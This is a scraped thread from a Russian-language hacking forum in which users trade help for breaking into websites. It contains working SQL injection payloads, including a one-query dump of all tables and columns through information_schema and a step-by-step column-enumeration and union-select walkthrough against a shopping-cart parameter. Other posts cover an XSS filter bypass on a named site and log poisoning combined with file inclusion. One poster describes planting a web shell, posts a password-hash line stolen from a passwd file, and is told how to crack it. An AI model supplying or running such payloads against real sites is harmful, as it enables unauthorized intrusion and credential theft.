HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1011  
Старый 18.01.2016, 12:42
powerOfthemind
Guest
Сообщений: n/a
Провел на форуме:
9212

Репутация: 1
По умолчанию

Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

 
Ответить с цитированием

  #1012  
Старый 18.01.2016, 13:29
Kolyan333
Guest
Сообщений: n/a
Провел на форуме:
7650

Репутация: 0
По умолчанию

Всем привет, помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак
 
Ответить с цитированием

  #1013  
Старый 18.01.2016, 13:47
PulsarEX547
Guest
Сообщений: n/a
Провел на форуме:
3988

Репутация: 0
По умолчанию

Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?

http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++
 
Ответить с цитированием

  #1014  
Старый 18.01.2016, 14:45
ArmusIAm
Guest
Сообщений: n/a
Провел на форуме:
7147

Репутация: 0
По умолчанию

Цитата:
Сообщение от Kolyan333  
Kolyan333 said:

Всем привет,
помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак
попробуй так

Цитата:
Сообщение от powerOfthemind  
powerOfthemind said:

Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

Не знаю что за ошибка, но по крайней мере в 19 строчке происходит запись в файл, можно попробовать поиграть с $_SERVER переменными (записать туда PHP код, который он запишет в лог файл, а потом подключить его инклудом если LFI есть)

Не могу сказать, прокатит или нет, но имя файла для хранения лога хранится в $file_log, есть вероятность что и ее можно подменить и сохранить лог куда тебе удобно)
 
Ответить с цитированием

  #1015  
Старый 18.01.2016, 15:00
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от madam  
madam said:

hahaha_10056 это имя базы данных
INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');

в данном моменте leadercoin_address является таблицей в текущей БД.

Цитата:
Сообщение от powerOfthemind  
powerOfthemind said:

Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

$file_log, в какой файл пишет? и что в начале файла прописано? есть ли что нить типо die() или exit() в начале файла?

Цитата:
Сообщение от PulsarEX547  
PulsarEX547 said:

Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?
http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++
в выводимое поле вставте вот это:

Цитата:
Сообщение от None  
(select(@x)from(select(@x:=0x00),(select(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2e,table_name, 0x3a,column_name))))x)
 
Ответить с цитированием

  #1016  
Старый 18.01.2016, 18:10
ol1ver
Guest
Сообщений: n/a
Провел на форуме:
55143

Репутация: 0
По умолчанию

Цитата:
Сообщение от ArmusIAm  
ArmusIAm said:

Ошибка гласит что запись дублируется и вторую такую он создать не может, из этого в принципе ничего не возмешь.
hahaha_10056 это твой логин? Можно проверить на SQL инъекцию, поэкспериментируй с отправляемыми данными, но сам с скулями в INSERT еще не сталкивался, + раскрытие пути.
Перебирай количество колонок: 79e4b338bee15a3d6ed248041302800c order by ..., далее делай запрос типаЖ -79e4b338bee15a3d6ed248041302800c union select 1,2,3 (кол-во столбцов)-- (обрати внимание на отрицательный параметр сессии) и посмотри, есть ли какие либо принтабельные поля, если да то это стандартная SQL инъекция. Если вывода нет, то тогда Blind
Можете показать payload на моем примере?Спасибо
 
Ответить с цитированием

  #1017  
Старый 18.01.2016, 18:56
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию

Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:

asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:asd.s1@asd.asd.ua:/home/asd.s1:/bin/bash

Как я понимаю зашифрован пароль или я ошибаюсь?

Заранее спасибо за ответ.
 
Ответить с цитированием

  #1018  
Старый 18.01.2016, 21:58
PulsarEX547
Guest
Сообщений: n/a
Провел на форуме:
3988

Репутация: 0
По умолчанию

2winstrool, спасибо! запрос сработал без заминок, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать.
 
Ответить с цитированием

  #1019  
Старый 18.01.2016, 23:32
ArmusIAm
Guest
Сообщений: n/a
Провел на форуме:
7147

Репутация: 0
По умолчанию

Цитата:
Сообщение от ol1ver  
ol1ver said:

Можете показать payload на моем примере?Спасибо
Для начала перебираешь кол-во колонок, следующим образом:

frontend=79e4b338bee15a3d6ed248041302800c order by 1#

Если отображает товары, значит запрос прошел, идем дальше.

frontend=79e4b338bee15a3d6ed248041302800c order by 5#

Если отображает товары, идем дальше

frontend=79e4b338bee15a3d6ed248041302800c order by 6#

Если в данном случае, не отображает - значит запрос не прошел, соответственно колонок получается 5 (это пример, у тебя по своему должно быть).

Если мы определили кол-во колонок, делаем следующее:

frontend=79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5-- (если у тебя колонок например 7, то до 7 (1,2,3,4,5,6,7))

Если все верно, то ошибки быть не должно, товары в корзине должны отображаться.

И далее:

frontend=-79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5--


Делаем значение frontend отрицательным, что бы посмотреть, если ли принтабельные поля (посмотри, появились ли где нибудь вместо текста циферки, например 1, 2, 4 любые, которых раньше не было.

Если есть, то это обычная инъекция, материала на эту тему много.

Если принтабельных полей нет, то это Blind SQL. Как его использовать тоже статей достаточно.

Цитата:
Сообщение от sysjuk  
sysjuk said:

Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:
asd.s1@asd.asd.ua
:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.
Да ты прав, он зашифрован. Говорят программа John The Ripperс этим может справиться.

Успехов!)
 
Ответить с цитированием

  #1020  
Старый 19.01.2016, 00:28
Kolyan333
Guest
Сообщений: n/a
Провел на форуме:
7650

Репутация: 0
По умолчанию

Ниче не помогло
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ